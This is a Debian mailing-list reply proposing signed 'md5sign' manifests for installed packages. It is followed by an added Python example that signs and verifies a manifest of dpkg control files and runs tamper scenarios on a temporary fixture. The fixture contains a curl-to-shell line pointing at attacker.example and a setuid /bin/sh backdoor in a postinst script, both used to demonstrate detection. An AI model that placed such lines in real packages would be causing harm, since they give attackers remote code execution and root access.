Re: packages without .md5sums file?



Igor Belyi writes:
> What I think is necessary is a signature on md5sums. There's
> a signature in the *.deb files but those are usually gone
> after installation. If there were <package>.md5sign or
> something like that with signature for md5sums this will
> be quite enough to verify files from the package.

Just to follow up on the issue.

I've sketched a Perl script which introduces md5sign files. Such a file
is a signed text which contains checksums for the control files (md5sums,
postinst, prerm, etc.) and some fields from the control file (only
"Maintainer" for now). This way the authenticity of all files can be
verified.

The script is just a "proof of concept" thing, but it can already sign
and verify installed packages and DEB archives.

Unfortunately, I don't have time to work on it now. If somebody in the
Debian community thinks there are grounds for this idea, I've put the
script, README, and TODO at
ftp://ftp.katehok.homeip.net/pub/debmd5sign.tar.gz

Good luck and thanks for all the fish.
Igor (Debian user)
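The scheme sketched in the message above, as an added example that is not Igor's Perl script and not part of the original posting: a manifest is built from the package's dpkg control files (md5sums, postinst, prerm, ...) plus the Maintainer field, the manifest is signed, and verification checks the signature before trusting md5sums. The example assumes SHA-256 for the manifest digests, uses an HMAC with a demo key as a stand-in for the detached PGP signature a real deployment would use, and works on a constructed fixture in a temporary directory rather than on /var/lib/dpkg/info.

```python
import hashlib
import hmac
import os
import tempfile

# dpkg keeps per-package control files as /var/lib/dpkg/info/<pkg>.<name>; the
# manifest covers whichever exist, plus the Maintainer field from the control stanza.
CONTROL_FILES = ("md5sums", "preinst", "postinst", "prerm", "postrm")
SIGNED_FIELDS = ("Maintainer",)


def read(path, mode="rb"):
    with open(path, mode) as f:
        return f.read()


def write(path, data):
    with open(path, "wb" if isinstance(data, bytes) else "w") as f:
        f.write(data)


def parse_control(text):
    # Minimal "Field: value" parser; continuation lines are ignored.
    fields = {}
    for line in text.splitlines():
        if ":" in line and not line.startswith((" ", "\t")):
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def build_manifest(info_dir, pkg, control_text):
    """Canonical text to be signed: package, Maintainer, one digest per control file."""
    lines = [f"Package: {pkg}"]
    fields = parse_control(control_text)
    lines += [f"{k}: {fields[k]}" for k in SIGNED_FIELDS if k in fields]
    for name in CONTROL_FILES:
        path = os.path.join(info_dir, f"{pkg}.{name}")
        if os.path.exists(path):
            lines.append(f"{hashlib.sha256(read(path)).hexdigest()}  {pkg}.{name}")
    return "\n".join(lines) + "\n"


def sign_manifest(manifest, key):
    # Assumption: HMAC stands in for a detached PGP signature so the example runs
    # offline; the manifest text is exactly what the real signature would cover.
    return hmac.new(key, manifest.encode(), hashlib.sha256).hexdigest()


def verify_md5sums(md5sums_path, root):
    """The unsigned check available today: each installed file against its md5sums line."""
    bad = []
    for line in read(md5sums_path, "r").splitlines():
        expected, rel = line.split("  ", 1)          # "<md5>  <relative path>"
        full = os.path.join(root, rel)
        actual = hashlib.md5(read(full)).hexdigest() if os.path.exists(full) else None
        if actual != expected:
            bad.append(rel)
    return bad


def verify_package(info_dir, pkg, control_text, root, sig, key):
    """Signed check: manifest signature first, then the per-file md5sums."""
    expected = sign_manifest(build_manifest(info_dir, pkg, control_text), key)
    if not hmac.compare_digest(expected, sig):
        return False, "manifest signature mismatch"
    bad = verify_md5sums(os.path.join(info_dir, f"{pkg}.md5sums"), root)
    return (False, "modified or missing: " + ", ".join(bad)) if bad else (True, "ok")


def demo():
    """Constructed fixture (not real dpkg data): sign one package, then tamper with it."""
    key, pkg = b"demo-signing-key", "hello"           # assumption: demo key
    payload = b"#!/bin/sh\necho hello\n"
    evil = payload + b"curl http://attacker.example/x | sh\n"
    r = {}
    with tempfile.TemporaryDirectory() as tmp:
        root, info = os.path.join(tmp, "root"), os.path.join(tmp, "info")
        os.makedirs(os.path.join(root, "usr/bin"))
        os.makedirs(info)
        binary = os.path.join(root, "usr/bin/hello")
        md5sums = os.path.join(info, "hello.md5sums")
        postinst = os.path.join(info, "hello.postinst")
        write(binary, payload)
        write(md5sums, f"{hashlib.md5(payload).hexdigest()}  usr/bin/hello\n")
        write(postinst, "#!/bin/sh\nexit 0\n")
        control = "Package: hello\nMaintainer: Example Maintainer <maint@example.org>\n"
        sig = sign_manifest(build_manifest(info, pkg, control), key)
        check = lambda: verify_package(info, pkg, control, root, sig, key)[0]

        r["clean"] = check()
        # 1. Binary modified: the plain md5sums check already catches this.
        write(binary, evil)
        r["binary_modified"] = check()
        # 2. md5sums rewritten to match: the unsigned check is blind, the signed one
        #    is not, because the digest of md5sums itself is in the manifest.
        write(md5sums, f"{hashlib.md5(evil).hexdigest()}  usr/bin/hello\n")
        r["md5sums_rewritten_unsigned_check"] = verify_md5sums(md5sums, root) == []
        r["md5sums_rewritten_signed_check"] = check()
        # 3. Restore, then backdoor the postinst: caught through its digest in the manifest.
        write(binary, payload)
        write(md5sums, f"{hashlib.md5(payload).hexdigest()}  usr/bin/hello\n")
        write(postinst, "#!/bin/sh\nchmod u+s /bin/sh\nexit 0\n")
        r["postinst_modified"] = check()
    return r
```

The second case is the one the proposal is about: an attacker who can edit files under /var/lib/dpkg/info can rewrite md5sums to match a trojaned binary, so an unsigned md5sums check proves nothing; only a signature that covers md5sums and the maintainer scripts makes the check meaningful.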
